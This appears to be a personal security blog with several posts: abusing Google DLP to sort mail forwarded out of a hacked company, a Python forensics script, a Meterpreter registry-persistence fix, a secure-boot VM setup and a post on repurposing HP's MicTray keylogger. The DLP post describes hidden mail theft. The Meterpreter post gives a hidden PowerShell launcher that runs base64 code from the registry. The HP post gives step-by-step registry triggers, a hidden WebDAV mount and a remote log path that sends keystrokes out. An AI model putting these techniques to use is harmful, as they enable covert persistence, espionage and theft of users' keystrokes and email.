Errr ok, so the “NSA-style content searching” might be a bit overrated, then again it’s usually only the intelligence agencies which perform this type of bulk search as far as I know. Anyhow, here is an idea on how to abuse Google DLP (available in google apps for work) to perform exactly the same, since it recently incorporated support to also perform OCR on the emails / attachments:

According to this screenshot it seems that you can also perform DLP actions on incoming items:

google-dlp

Which is what enables us to perform specific content searches on all incoming email messages and prepend certain keywords to the subject. Now imagine you just hacked an organisation and added a rule to the exchange server or individual outlook instances to forward all email to an email address you control which has DLP enabled with all the keywords, hashes or rules you need to only get the juicy contents out? Don’t forget to delete the forwarded message with a rule ;) The types of content matching that you can perform are also pretty flexible:

  • Pattern match—A specific alphanumeric pattern (not just string length), including delimiters, valid position, and valid range checks
  • Context—Presence of relevant strings in proximity to pattern and/or checksum matching string
  • Checksum—Checksum computation and verification with check digit
  • Word/phrase list—Full or partial match to an entry found in a dictionary of words and phrases

Based on the DLP trigger you can then just rename the subject and use google rules to forward the message to another inbox or leave it there and just organise it into folders. Kinda saves you as an attacker a lot of time, since normally you’d have to perform or implement OCR / content matching yourself. Added bonus is that since it’s already been stolen from the victim company it doesn’t really matter what you do with it as long as the original sender doesn’t receive some weird Google notification.

You might be thinking “my client will never allow this”, but what if your client is already connected to google apps for work?

As a final thought you could also use this for defence purposes if you are already working with Google apps for work as an organisation. You could use the Google DLP feature to feed it the currently hyped ‘threat intelligence’ file hash information and block different known threat actors if their tools & techniques remain the same for a period of time.


Filed under: general Tagged: content search, dlp, exchange, google, intel, nsa, outlook

[python] Poor man’s forensics


So after a period of ‘lesser technical times’ I finally got a chance to play around with bits, bytes and other subjects of the information security world. A while back I got involved in a forensic investigation and participated with the team to answer the investigative questions. This was an interesting journey since a lot of things piqued my interest or ended up on one of my todo lists.

One of the reasons that my interest was piqued is that yes, you can use a lot of pre-made tools to process the disk images and after that processing is done you can start your investigation. However, there are still a lot of questions you could answer much quicker if you had a subset of that data available ‘instantly’. The other reason is that not all the tools understand all the filesystems out there, which means that if you encounter an exotic file system your options are heavily reduced. One of the tools I like and which inspired me for these quick & dirty scripts is ‘mac-robber’ (be aware that it changes file times if the destination is not mounted read-only) since it’s able to process any file system as long as it’s mounted on an operating system on which mac-robber is able to run. An example of running mac-robber:

sudo mac-robber mnt/ | head
class|host|start_time
body|devm|1471229762
MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime
0|mnt/.disk|0|dr-xr-xr-x|0|0|2048|1461191363|1461191353|1461191353|0
0|mnt/.disk/base_installable|0|-r--r--r--|0|0|0|1461191363|1461191316|1461191316|0
0|mnt/.disk/casper-uuid-generic|0|-r--r--r--|0|0|37|1461191363|1461191353|1461191353|0

You can even timeline the output if you want with mactime:

sudo mac-robber mnt/ | mactime -d | head
Date,Size,Type,Mode,UID,GID,Meta,File Name
Thu Jan 01 1970 01:00:00,2048,...b,dr-xr-xr-x,0,0,0,"mnt/.disk"
Thu Jan 01 1970 01:00:00,0,...b,-r--r--r--,0,0,0,"mnt/.disk/base_installable"
Thu Jan 01 1970 01:00:00,37,...b,-r--r--r--,0,0,0,"mnt/.disk/casper-uuid-generic"
Thu Jan 01 1970 01:00:00,15,...b,-r--r--r--,0,0,0,"mnt/.disk/cd_type"
Thu Jan 01 1970 01:00:00,60,...b,-r--r--r--,0,0,0,"mnt/.disk/info"

Now that’s pretty useful and quick! One of the things I missed however was the ability to quickly extend the tool as well as focus on just files. From a penetration testing perspective I find files much more interesting in a forensic investigation than directories and their meta-data. This is of course tied to the type of investigation you are doing, the goal of the investigation and the questions you need answered.

I decided to write a mac-robber(ish) python version to aid me in future investigations as well as learning a thing or two along the way. Before you continue reading please be aware that:

  1. The scripts have not gone through extensive testing
  2. Thus should not be blindly trusted to produce forensically sound output
  3. The regular ‘professional’ tools are not perfect either and still contain bugs ;)

That being said, let’s have a look at the type of questions you can answer with a limited set of data and how that could be done with custom written tools. If you don’t care about my ramblings, just access the Github repo here. It has become a bit of a long article, so here are the ‘chapters’ that you will encounter:

  1. What data do we want?
  2. How do we get the data?
  3. Working with the data, answering questions
    1. Converting to body file format
    2. Finding duplicate hashes
    3. Permission issues
    4. Entropy / file type issues
  4. Final thoughts

What data do we want?

We can answer this question partially by looking at the standard fls tool:

  • md5
  • file type as reported in file name and metadata structure (see above)
  • Metadata Address
  • name
  • mtime (last modified time)
  • atime (last accessed time)
  • ctime (last changed time)
  • crtime (created time)
  • size (in bytes)
  • uid (User ID)
  • gid (Group ID)

The above can answer quite a lot of questions, although it would be nice to also have information like:

  • multiple hash formats
  • file entropy
  • file type (as outputted normally by the ‘file’ command)

The multiple hash formats is a nice to have since md5 should really be deprecated, the entropy is nice since it helps us to maybe find encrypted files. Which brings us into the danger region of ‘oh but this data is also nice’ behaviour, so for now we are going to settle on the following:

  • <variable hashes> (as supported by hashlib)
  • path (file path)
  • atime
  • mtime
  • ctime
  • size
  • uid
  • gid
  • permissions (octal representation)
  • permissions_h (symbolic representation)
  • inode
  • device_id
  • st_blocks
  • st_blksize
  • st_rdev
  • st_flags
  • st_gen
  • st_birthtime
  • st_ftype
  • st_attrs
  • st_obtype
  • entropy (shannon calculation)
  • type (file output)

Why the above data? Mostly because of:

  • Large part is standard to other tools as well
  • Large part is just all the output of python’s ‘os.stat’
  • Some is useful to have and avoids processing or querying the file again
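
The entropy field in the list above is a Shannon calculation over the byte histogram of the file. A minimal standalone sketch (Python 3, naming is mine) of what that per-file computation looks like:

```python
import math
from collections import Counter

def shannon_entropy(data):
    # H = sum(p(b) * log2(1/p(b))) over all byte values present in the data;
    # 0.0 for a single repeated byte, 8.0 for a uniform spread over 256 values
    if not data:
        return 0.0
    total = len(data)
    return sum((n / total) * math.log2(total / n)
               for n in Counter(data).values())

print(shannon_entropy(b"aaaa"))            # 0.0
print(shannon_entropy(bytes(range(256))))  # 8.0
```

High-entropy files (values approaching 8.0) are the crypto containers and keys the post hunts for later.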

How do we get the data?

I chose to use python since it’s easy to develop for and it has a lot of built-in libraries. Additionally it runs on a lot of platforms if you’d ever need to run the script on a different platform. So what are some of the requirements?

  • Run on mount points
    • Focus on files only
  • Be fast
    • Avoid redoing tasks
    • Try to be disk i/o efficient
      • Read once, operate many
  • Workable output format

The reason for the requirement of the script to operate on mount points is that this way we can avoid the challenge of operating on obscure file systems. If we need to operate on an obscure file system we can just expose that file system over some kind of sharing mechanism like NFS or SMB or run the script directly on the operating system. This does of course influence how forensically accurate the data can be depending on the sharing method, but since this is just intended to answer some quick questions while the more professional tools are working we should be fine.

If what we want to achieve has to be done while other tools are retrieving more detailed data for forensics analysis, it means that our script should be as quick as possible (within the constraints of an interpreted language). For this we are going to use the multiprocessing module. The reason for this is that python threads are not really as effective as ‘real’ threads. If you are wondering why, you should read this article. The short version is that python has a ‘Global Interpreter Lock (GIL)’ which prevents python from really running different threads at the same time. Thus if we really need concurrent operations to happen we have to resort to splitting the tasks up into different processes. Another way of improving speed is of course to not redo tasks which other specialised tools can perform much faster. For example, recursively walking a directory tree could be done with find:

find / -type f > filelist.txt

Thus to avoid redoing tasks it’d be great if we could just do:

cat filelist.txt | our_script.py
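
Supporting that pipe-in mode only takes a few lines; a sketch (Python 3, names are mine and not necessarily what pmf.py uses) of consuming the pre-computed file list from stdin:

```python
import sys

def iter_paths(stream=sys.stdin):
    # One path per line, as produced by `find / -type f`; skip empty lines
    for line in stream:
        path = line.rstrip("\n")
        if path:
            yield path

# Example with an in-memory stream instead of a real pipe
import io
print(list(iter_paths(io.StringIO("/etc/mtab\n\n/etc/hosts\n"))))
```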

Since we are going to script it, reducing disk i/o is a must. Most of the data could be retrieved with bash and standard linux tools, but it would greatly slow the process down due to the disk i/o. The speed requirement can be easily achieved by reading all files in manageable chunks and then performing as many of the data extraction operations as possible on each chunk. I chose to implement this in the following way (fiddle with chunk size if you want less disk i/o for each file, avoid reading the entire file due to possible memory constraints):

    def chunked_reading(self):
        with open(self.fileloc, 'rb') as f:
            while True:
                chunk = f.read(CHUNKSIZE)
                if chunk != '':
                    yield chunk
                else:
                    break

The above function makes it possible to iterate over each chunk, thus being able to do this:

        for ictr, i in enumerate(self.chunked_reading()):
            if ictr == 0:
                self.magic = magic.from_buffer(i) #comment if no filemagic available

            self.hashfile_update(i)
            self.entropy_bytecount(i)

        self.hashfile_final()
        self.entropy_shannon(filesize)

Pretty cool right? We just need one disk i/o operation to get:

  • Multiple hashes
  • File type, based on the lib-magic library
  • Entropy of the file

The one thing that seems not to be possible is to retrieve the os.stat output within the same disk i/o operation, which for our script is fine. Coming back to the speed requirement it also means that we can process each file individually and thus operate with multiple processes at once, like so:

def create_workers(filelist_q, output_q, algorithms, amount=get_cpucount()):
    workers = list()
    for ictr, i in enumerate(range(amount)):
        procname = "processfile.%s" % ictr
        p = Process(target=processfile, name=procname, args=(filelist_q, output_q, algorithms))
        p.start()
        workers.append(p)
    return workers

After all the above has been implemented into pmf.py the output looks like this (shortened to keep the layout):

dev@devm:~$ sudo python pmf.py /etc/ md5 sha1 | head -n2
"md5","sha1","path","atime","mtime","ctime","size","uid","gid","permissions","inode","device_id","st_blocks",[…]
"a54ba0d50ae3e0afa0ba4eee3f463f98","3544c319406d97a23ca4d10092a6c64963b2d3c0","/etc/mtab","1470958953.01",[…]

Like you can see I chose the CSV output format with all the values quoted as the ‘workable’ format. This will hopefully make it easy to convert the output to other formats and work with it on the command-line.
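
Since the values are quoted CSV, Python's own csv module parses the output directly if csvtool isn't available; a quick sketch using a made-up sample row in the same layout:

```python
import csv
import io

# Hypothetical, shortened pmf.py output: quoted CSV with a header row
sample = '"md5","path","size"\n"a54ba0d5","/etc/mtab","0"\n'
rows = list(csv.DictReader(io.StringIO(sample)))
print(rows[0]["path"])  # /etc/mtab
```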

Working with the data, answering questions

Since we now have a script that is able to produce the data which we need, let’s see how we can use this data to answer a couple of example questions. All the work will be done on the command line to keep it simple, which also results in the benefit that you can reuse the commands with other CSV file based forensic output.

One of the easiest way to work with the CSV format is to use ‘csvtool’, which you can install by running:

sudo apt-get install csvtool

If you want to benefit from the libmagic file type identification of pmf.py you need to install the corresponding python library with pip:

sudo pip install python-magic

We will also need some test data, for this I used the file ‘ubuntu-16.04-desktop-amd64.iso’ and mounted it on the ‘mnt’ folder within the following directory structure:

  • ~/
  • ~/test/
  • ~/test/mnt

The command I used was:

sudo mount -o loop,ro,noexec /mnt/hgfs/iso/ubuntu-16.04-desktop-amd64.iso mnt/

After this was done I generated the data with the following commands:

sudo find mnt/ -type f > filelist.txt
sudo python pmf.py mnt/ md5 sha1 > o.txt

It might take a while, but just let it run. If you need to list the guaranteed hashing algorithms of hashlib you can do:

python -c "import hashlib;print hashlib.algorithms"

Now that we’ve setup the data that we’d like to work with, let’s start answering questions.

Converting to body file format (timeline)

One of the goals was to have a somewhat workable format, which means that we should be able to get pretty close to the defined body file format as follows:

csvtool -u \| namedcol md5,path,inode,permissions_h,uid,gid,size,atime,mtime,ctime,st_birthtime o.txt

which should output:

csvtool -u \| namedcol md5,path,inode,permissions_h,uid,gid,size,atime,mtime,ctime,st_birthtime o.txt | head
md5|path|inode|permissions_h|uid|gid|size|atime|mtime|ctime|st_birthtime
eb2488189c4e0458885f9ed82282e79a|mnt/README.diskdefines|1325|-r--r--r--|0|0|230|1461191391|1461191315|1461191315|0
d41d8cd98f00b204e9800998ecf8427e|mnt/.disk/base_installable|1414|-r--r--r--|0|0|0|1461191363|1461191316|1461191316|0
09da98c6ddb1686651ef36408882ed47|mnt/.disk/casper-uuid-generic|1418|-r--r--r--|0|0|37|1461191363|1461191353|1461191353|0

Which like you might realise results in the ability to timeline it with mactime, but you lose the extra data that we added.

Finding duplicate hashes

Finding the hashes:

csvtool namedcol md5 o.txt | csvtool drop 1 - | sort -t, -k1,1 | uniq -c | grep -v '1 ' | sed s/'^ *'//

2 4a4dd3598707603b3f76a2378a4504aa
3 d41d8cd98f00b204e9800998ecf8427e

Displaying the names sorted by size can be done as well by extending the one liner:

for i in $(csvtool namedcol md5 o.txt | csvtool drop 1 - | sort -t, -k1,1 | uniq -c | grep -v '1 ' | sed s/'^ *'// | cut -d' ' -f2);do grep $i o.txt | csvtool cols 1,7,3 - | sort -t, -k3,3;done

d41d8cd98f00b204e9800998ecf8427e,0,mnt/.disk/base_installable
d41d8cd98f00b204e9800998ecf8427e,0,mnt/isolinux/adtxt.cfg
d41d8cd98f00b204e9800998ecf8427e,0,mnt/isolinux/hi.hlp
4a4dd3598707603b3f76a2378a4504aa,20,mnt/dists/xenial/main/binary-i386/Packages.gz
4a4dd3598707603b3f76a2378a4504aa,20,mnt/dists/xenial/restricted/binary-i386/Packages.gz
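
The same grouping can also be done in a few lines of Python when the csvtool one-liners get unwieldy (column names taken from the pmf.py output, sample data made up and shortened):

```python
import csv
import io
from collections import defaultdict

def duplicate_hashes(csv_text):
    # Group paths per md5 and keep only hashes seen more than once
    groups = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        groups[row["md5"]].append(row["path"])
    return {h: paths for h, paths in groups.items() if len(paths) > 1}

sample = ('"md5","path"\n'
          '"d41d8cd9","mnt/.disk/base_installable"\n'
          '"d41d8cd9","mnt/isolinux/adtxt.cfg"\n'
          '"4a4dd359","mnt/README.diskdefines"\n')
print(duplicate_hashes(sample))
```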

Permission issues

csvtool namedcol uid,permissions,path e.txt | csvtool drop 1 - | sort -t, -k2,2 | cut -d, -f2 | uniq -c | sort -b -k1 -n

1 0444
2 0440
13 0664
16 0640
25 0600
213 0755
1380 0644

Or if you want the more human readable output:

csvtool namedcol permissions_h,path e.txt | csvtool drop 1 - | sort -t, -k1,1 | cut -d, -f1 | uniq -c | sort -b -k1 -n

1 -r--r--r--
2 -r--r-----
13 -rw-rw-r--
16 -rw-r-----
25 -rw-------
213 -rwxr-xr-x
1380 -rw-r--r--

With the above output you can now zoom in on files which are world readable or writeable or which are read and write by for example just grepping for the permissions in the original data.

Entropy / file type issues

To create an overview of the files and their entropy you can just do:

csvtool namedcol entropy,path,type o.txt | csvtool drop 1 - | sort -t, -k1,1

0.1104900679412788,mnt/isolinux/boot.cat,"FoxPro FPT, blocks size 0, next free block index 16777216"
0.7708022808463271,mnt/boot/grub/x86_64-efi/legacy_password_test.mod,"ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV)"
1.5567796494470394,mnt/dists/xenial/main/binary-i386/Packages.gz,"gzip compressed data, from Unix, max compression"
1.5567796494470394,mnt/dists/xenial/restricted/binary-i386/Packages.gz,"gzip compressed data, from Unix, max compression"

If you are wondering how this can be useful, if we rerun the same command on pmf.py output on the /etc/ directory we find:

6.020547926192353,/etc/ssl/private/ssl-cert-snakeoil.key,ASCII text

Which due to the ‘.key’ extension is pretty obvious, but without that extension we would not have found that this is in fact a private key. Entropy is a neat little extra piece of information which can help you to find crypto containers, private keys or other high entropy data.

Final thoughts

Just like the title says, this is just an example of how you can perform some poor man’s forensics with self-written tools. Even though it isn’t as sophisticated as the professional tools out there you can get a fair amount of work done by just using some rudimentary information and ‘querying’ it in a smart way. If you want to improve the ‘querying’ part you could of course import the data into a Splunk or ELK instance.

Make sure you read and understand the source of the scripts and that you verify and validate the output, like all software they contain bugs ;)

References


Filed under: general, security Tagged: dfir, forensics, mac-robber, mactime, python, timeline

Meterpreter, registry & unicode quirk work around


So this is a quick post with hopefully the goal of saving somebody else some time. Just for the record, I could have missed something totally trivial and I will hopefully get corrected :)

When working with the registry_persistence module, it turns out that one of the registry entries turns into garbage. At first I blamed myself of course, but it turned out that this is probably a bug in the meterpreter code, though I’m not sure if it really is a bug or if there is a new API call which I haven’t found yet. So when executing the module the registry looks like this:

registry_garbled

Like you can see that’s not exactly how it should look, since what we are expecting is something more human readable and an actual powershell command.

The quick work around is to generate the correct string with the correct encoding and for me it was easier to do this with python:

a = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"sleep 1; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:myregkey_name').GetValue('myregkey_value'))))\""
b = '\\x'.join("{:02x}".format(ord(c)) for c in a.encode('UTF-16LE'))
print '\\x' + b

You can then just hard code the output string into the module (replace the original ‘cmd=’ string with your hex encoded one like cmd=”\x25\x00″ etc) and it should appear correctly in your registry. Following screenshot shows before and after:

registry_fixed

If you are curious how you could debug similar bugs yourself, keep on reading for a short tour of the problem solving part. If you are wondering why I don’t submit a PR to metasploit, that’s cause unicode scares the **** out of me. My usual experience is I generate more problems when dealing with unicode than I intended to fix.

Debugging is of course a different process for each person, but one of the ways to learn is to read how other people debug stuff which made me decide to share more of these ‘brain dumps’ in the future.

So a couple of things I tried when I first saw the garbled registry entry, not necessarily in the same chronological order:

  • Run meterpreter on other instances of Windows
  • Check the Windows encoding
  • Read the module source code
  • Edit the module source code to just set one word
  • Lookup the documentation for REG_EXPAND_SZ
    • A null-terminated string that contains unexpanded references to environment variables (for example, “%PATH%”). It will be a Unicode or ANSI string depending on whether you use the Unicode or ANSI functions. To expand the environment variable references, use the ExpandEnvironmentStrings function.
  • Check how the string is actually written into the registry by right clicking and choosing “Modify binary data”
    • Written as ascii
  • Writing a test string to the same registry key with ‘regedit.exe’ and checking how that string is written
    • Surprise it’s UTF16LE, the null bytes after each character gave it away
    • Which explains why it looks so weird, since Windows is trying to display / interpret ‘ascii’ as UTF16LE
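
That null-byte giveaway is easy to reproduce anywhere; encoding the same text as ASCII and as UTF-16LE shows exactly the pattern you see in the “Modify binary data” view:

```python
text = "%COMSPEC%"
# ASCII: one byte per character
print(text.encode("ascii"))      # b'%COMSPEC%'
# UTF-16LE: every character followed by a null byte, which is the giveaway
print(text.encode("utf-16-le"))  # b'%\x00C\x00O\x00M\x00S\x00P\x00E\x00C\x00%\x00'
```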

So after doing all of the above I realized that our string was passed as ascii to the API and it probably got written to the registry by using a unicode function. Time to dig into the src:

  • First thing I searched for in the metasploit repo was:
    • “def registry_setvaldata”
  • Which brings us to the file and function:
  • Which we can find in the same file
    •  Line 588 shows “session.sys.registry.set_value_direct(root_key, base_key,”
  • Searching for “set_value_direct” brings us to
    • lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
    • Line 231 contains the function, and the “TLV” strings give away that this is the part where the command is sent to meterpreter. TLV (type, length, value) is the protocol that meterpreter uses.
    • Line 232 contains the function we need to search for in the meterpreter git repo
      • stdapi_registry_set_value_direct
  • SWITCH TO METERPRETER GIT REPO
  • Which brings us to c/meterpreter/source/extensions/stdapi/server/sys/registry/registry.c
    • Line 508 contains the next function “set_value” we search for
    • Line 440 contains the actual implementation

The important lines of code and the ones on which I based my conclusion of converting the string to UTF16LE are the following (lines 456 – 473):

	// Get the value data TLV
	if (packet_get_tlv(packet, TLV_TYPE_VALUE_DATA, &valueData) != ERROR_SUCCESS) {
		result = ERROR_INVALID_PARAMETER;
	} else {
		// Now let's rock this shit!
		void *buf;
		size_t len = valueData.header.length;
		if (valueType == REG_SZ) {
			buf = utf8_to_wchar(valueData.buffer);
			len = (wcslen(buf) + 1) * sizeof(wchar_t);
		} else {
			buf = valueData.buffer;
		}
		result = RegSetValueExW(hkey, valueName, 0, valueType, buf, (DWORD)len);
		if (buf != valueData.buffer) {
			free(buf);
		}
	}

The above code retrieves the value we are setting from the TLV packet and then checks if the valueType is of the kind “REG_SZ”, which triggers a conversion of the data from UTF8 to Windows wide char (in essence UTF16LE). If this is not the case the original data from the packet is NOT converted. However, the function used to write the value is always “RegSetValueExW”, which is the unicode variant and thus will always write the content as if it was passed in the correct UTF16LE encoding.

Thus leading to the conclusion that since our registry key type does not fit the ‘conversion’ case and its content is directly written by a unicode aware function, we need to pass in the data in the correct format ourselves.
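Since meterpreter won’t do the conversion for us for this value type, the workaround from the start of this post is to do the UTF16LE encoding ourselves before hard coding the string into the module. A quick sketch of generating such an escaped string (Python 3; the command string is just an example value):

```python
# Encode a string as UTF-16LE and print it as an escaped hex string
# that can be hard coded into the module (cmd="\x63\x00..." style)
cmd = 'echo hello'  # example value, replace with your own string
encoded = cmd.encode('utf-16-le')
print(''.join('\\x{:02x}'.format(b) for b in encoded))
```

Paste the printed string into the module in place of the original value and the registry entry should display correctly.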


Filed under: general, midnight thoughts, security Tagged: metasploit, meterpreter, quirk, unicode, utf16le, workaround

Win10 secure boot inside vmware fusion


Quick blog to remind myself what the correct combination of options is to run Windows 10 Pro x64 with secure boot enabled within VMWare Fusion. A couple of reasons why you’d want to do this:

  • Avoid a secondary dedicated laptop
    • Avoid having a physical TPM chip
  • Get familiar with Hyper-V
  • Better understand and research secure boot
  • Get more familiar with memory analysis on hypervisor memory
  • Just for fun

Fusion settings

  • Enable EFI by adding the following to the ‘.vmx’ file
    • firmware = “efi”
  • Enable VT-x/EPT
    • can be found in setting under “Processors & Memory”, “advanced settings”
  • Choose OS type “Hyper-V (unsupported)”
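For reference, the end result in the ‘.vmx’ file looks roughly like this (a sketch: ‘vhv.enable’ is the setting the VT-x/EPT checkbox writes, and the exact guestOS identifier may differ between Fusion versions):

```
firmware = "efi"
vhv.enable = "TRUE"
guestOS = "winhyperv"
```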

Windows 10 Pro x64 (host) settings

  • Right click on the windows start menu icon and select
    • Programs and Features
      • Turn Windows features on or off
    • Select the Hyper-V role
  • Using the Hyper-V Manager create a “Generation 2” VM
    • In Settings -> Security check the “Enable Trusted Platform Module” checkbox
  • When booting hold down a key or it won’t detect the installation ISO

Windows 10 Pro x64 (guest) settings

  • Right click on the C drive and select “Enable bitlocker”
  • Add a second hard disk and create a folder on it to save the bitlocker recovery key



Filed under: general Tagged: efi, hyper-v, secure boot, tpm, vmware fusion

Repurposing the HP audio key logger


The last couple of days there has been some fuss about the HP audio key logger as disclosed by modzero in their blog post and the detailed advisory that they released. The following sentence in their advisory piqued my interest:

This type of debugging turns the audio driver effectively into a keylogging spyware.

With all the hyped ‘repurposing’ of tools that is going on lately, I wondered how difficult it actually is to turn this into an intentional piece of malware. The reason I find this interesting is that according to different sources it’s legitimate software which has been correctly code-signed and is not classified as malware by all anti-virus solutions, yet.

https://www.virustotal.com/nl/file/e882149c43976dfadb2746eb2d75a73f0be5aa193623b18b50827f43cce3ed84/analysis/

https://www.virustotal.com/nl/file/c046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8/analysis/

The current detection signatures are also pretty weak, since they mostly deem it ‘riskware’ or a ‘potentially unwanted application (PUA)’. This could have the side effect that users or administrators dismiss warnings that are actually signs of an attacker abusing the HP audio key logger for malicious purposes.

For red team purposes this is still a nice addition, since it pushes the person analysing this potential incident to really understand what is going on and to figure out that legitimate software is being abused for malicious purposes. Especially since the binary will not be modified and thus the code-signing remains valid (until the certificate is revoked).

Let’s dive into the technical details on the path / approach I followed on repurposing this piece of legitimate software for nefarious red team purposes ;)

I gave myself three goals before I started repurposing the HP audio software:

  • Keep it simple
  • Log all keystrokes remotely
  • Hide where possible

The first action was to get a copy of the exact version of the software as described in the advisory, which luckily for me was a breeze since they linked to the correct location. This is something that more advisories should do, since it makes follow-up research so much easier! Just for reference purpose the download link for the version I used is:

ftp://whp-aus1.cold.extweb.hp.com/pub/softpaq/sp79001-79500/sp79420.exe

The next thing was of course figuring out which files I would need to correctly deploy this as malware onto another system. The original install package is a whopping 174MB, which is not something you want to install on the targets ;) The starting point was of course the (excellently written) advisory which mentions ‘MicTray64.exe’.

Instead of installing the downloaded installer file I opted for the route in which I just opened the installer with 7-zip and manually browsed the content. This resulted in finding the ‘mictray.exe’ and ‘mictray64.exe’  files in the following locations:

sp79420.exe\\Audio\X86\MicTray.cab\MicTray\MicTray\
sp79420.exe\\Audio\X64\MicTray.cab\MicTray\MicTray\

I extracted the two executable files in the hope that this would be all that I’d need to repurpose them, both as an addition to red team operations and out of good old curiosity for learning purposes. To my surprise I could run them without any errors and the log file mentioned in the advisory got created in the specified location; this was starting to look good for my first goal of keeping it simple. A small hiccup quickly presented itself however, since no keystrokes were logged.

The advisory mentions registry keys as being some kind of trigger:

If the logfile does not exist or the setting is not yet available in Windows registry, all keystrokes are passed to the OutputDebugString API

To the PROCMON! The trusted tool for attackers and defenders to obtain a first insight into the working of software in many situations. ProcMon looks like this when you start MicTray or MicTray64 and only enable the registry view:

When you repeat the process a couple of times it becomes clear that MicTray needs the following registry keys to start the actual key logging part. I’m running a 64bit Windows 7, which explains the weird second key: I ran the 32bit MicTray on a 64bit platform, while the first key belongs to MicTray64 on a 64bit platform:

HKEY_LOCAL_MACHINE\SOFTWARE\conexant\MicTray\Hotkey

(dword) CustomSettings:1

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Conexant\MicTray\Hotkey

(dword) CustomSettings:1
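In ‘.reg’ file format the two trigger keys described above would look something like this (a sketch based on the keys above; importing it requires admin rights since it writes to HKLM):

```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Conexant\MicTray\Hotkey]
"CustomSettings"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Conexant\MicTray\Hotkey]
"CustomSettings"=dword:00000001
```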

At this point we have reproduced the original advisory and are able to deploy a single file onto a system, create the correct trigger key and have it start logging keystrokes. A small caveat that I skipped over is the fact that I also ran the installer to speed up this process, which resulted in the following pre-populated registry keys (.reg file format) and made it possible to quickly identify the previously described registry keys that trigger the key logging functionality:

[HKEY_CURRENT_USER\Software\Conexant]

[HKEY_CURRENT_USER\Software\Conexant\MicTray.exe]
"J_ERROR"=dword:00000001
"J_WARNING"=dword:00000001
"J_DSOUND"=dword:00000001
"J_DSOUND_V"=dword:00000000
"J_SNDLB"=dword:00000001
"J_DEVICE"=dword:00000001
"J_DEVICE_V"=dword:00000000
"J_ENUM_DEV"=dword:00000001
"J_DRIVER"=dword:00000001
"J_REG"=dword:00000001
"J_IOCTL"=dword:00000001
"J_IOCTL_V"=dword:00000001
"J_NOTIFY"=dword:00000001
"J_NOTIFY_V"=dword:00000000
"J_WINDOWS"=dword:00000001
"J_WMSG"=dword:00000001
"J_KEY"=dword:00000001
"J_FILE"=dword:00000001
"J_LOCK"=dword:00000001
"J_EP_PROPS"=dword:00000001
"J_EP_PROPS_V"=dword:00000000
"J_NODES"=dword:00000001
"J_NODES_V"=dword:00000000
"J_TOPO"=dword:00000001
"J_TOPO_V"=dword:00000001
"J_NODE_ST"=dword:00000001
"J_SRC"=dword:00000001
"J_SRC_V"=dword:00000001
"J_ANGENT"=dword:00000001
"J_STATE"=dword:00000001
"J_CMDLINE"=dword:00000001
"LogName"="C:\Users\Public\MicTray.log"

[HKEY_CURRENT_USER\Software\Conexant\MicTray64.exe]
"J_ERROR"=dword:00000001
"J_WARNING"=dword:00000001
"J_DSOUND"=dword:00000001
"J_DSOUND_V"=dword:00000000
"J_SNDLB"=dword:00000001
"J_DEVICE"=dword:00000001
"J_DEVICE_V"=dword:00000000
"J_ENUM_DEV"=dword:00000001
"J_DRIVER"=dword:00000001
"J_REG"=dword:00000001
"J_IOCTL"=dword:00000001
"J_IOCTL_V"=dword:00000001
"J_NOTIFY"=dword:00000001
"J_NOTIFY_V"=dword:00000000
"J_WINDOWS"=dword:00000001
"J_WMSG"=dword:00000001
"J_KEY"=dword:00000001
"J_FILE"=dword:00000001
"J_LOCK"=dword:00000001
"J_EP_PROPS"=dword:00000001
"J_EP_PROPS_V"=dword:00000000
"J_NODES"=dword:00000001
"J_NODES_V"=dword:00000000
"J_TOPO"=dword:00000001
"J_TOPO_V"=dword:00000001
"J_NODE_ST"=dword:00000001
"J_SRC"=dword:00000001
"J_SRC_V"=dword:00000001
"J_ANGENT"=dword:00000001
"J_STATE"=dword:00000001
"J_CMDLINE"=dword:00000001
"LogName"="C:\Users\Public\MicTray.log"

Now that we have reproduced the behaviour as described by modzero, let’s see how we can receive the keystrokes remotely; after all, the registry key ‘LogName’ is a pretty good candidate to achieve this. The first thing that came to mind was WebDav, so I just followed the first google hit on setting up a WebDav server:

https://www.digitalocean.com/community/tutorials/how-to-configure-webdav-access-with-apache-on-ubuntu-14-04

After setting it up, the next challenge was our third goal, attempting to hide whenever possible. This turned out to be pretty straightforward, since you can mount WebDav shares without them showing up in the Windows GUI by using the following command:

net use http://172.16.218.156/webdav/ repurpose /user:alex

By not specifying the drive letter Windows will connect and authenticate, but it will not display a drive letter to the user. Only if the user issues the ‘net use’ command will he be able to see the remotely mounted path. All we have to do now is change the LogName value in the registry to this:

\\172.16.218.156\webdav\omg.log

and all the keystrokes will be sent to a remote machine. If you are wondering why WebDav: it uses normal ports (80, 443), thus enabling us to traverse firewalls more easily, and secondly you can apply some TLS protection to the connection, thus preventing prying eyes from seeing that you are exfiltrating keystrokes from their network:
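For completeness, the LogName change expressed in ‘.reg’ format would look like this (note that ‘.reg’ files require backslashes in string values to be escaped; the IP and share name are from the lab setup above):

```
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Conexant\MicTray64.exe]
"LogName"="\\\\172.16.218.156\\webdav\\omg.log"
```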

Pretty neat right? We’ve just abused legitimate software to capture and send keystrokes to our remote server, all with the comfort of having the binary correctly code-signed :)

The follow-up steps are of course left as an exercise to the reader ;) If you are wondering what is left, that would be:

  • Executing the MicTray application on user login
  • Running the MicTray application without it being visible as a tray icon
  • Packing it all neatly into a single executable

Hope you enjoyed it, but more importantly ask yourself the question: How much more legitimate software is out there that could be repurposed as an attack tool?


Filed under: general Tagged: hp, keylogger, procmon, webdav

Quantum Insert: bypassing IP restrictions


By now everyone has probably heard of Quantum Insert NSA style, if you haven’t then I’d recommend to check out some articles at the end of this post. For those who have been around for a while the technique is not new of course and there have been multiple tools in the past that implemented this type of attack. The tools enabled you to for example fully hijack a telnet connection to insert your own commands, terminate existing connections or just generally mess around with the connection. Most of the tools relied on the fact that they could intercept traffic on the local network and then forge the TCP/IP sequence numbers (long gone are the days that you could just predict them).

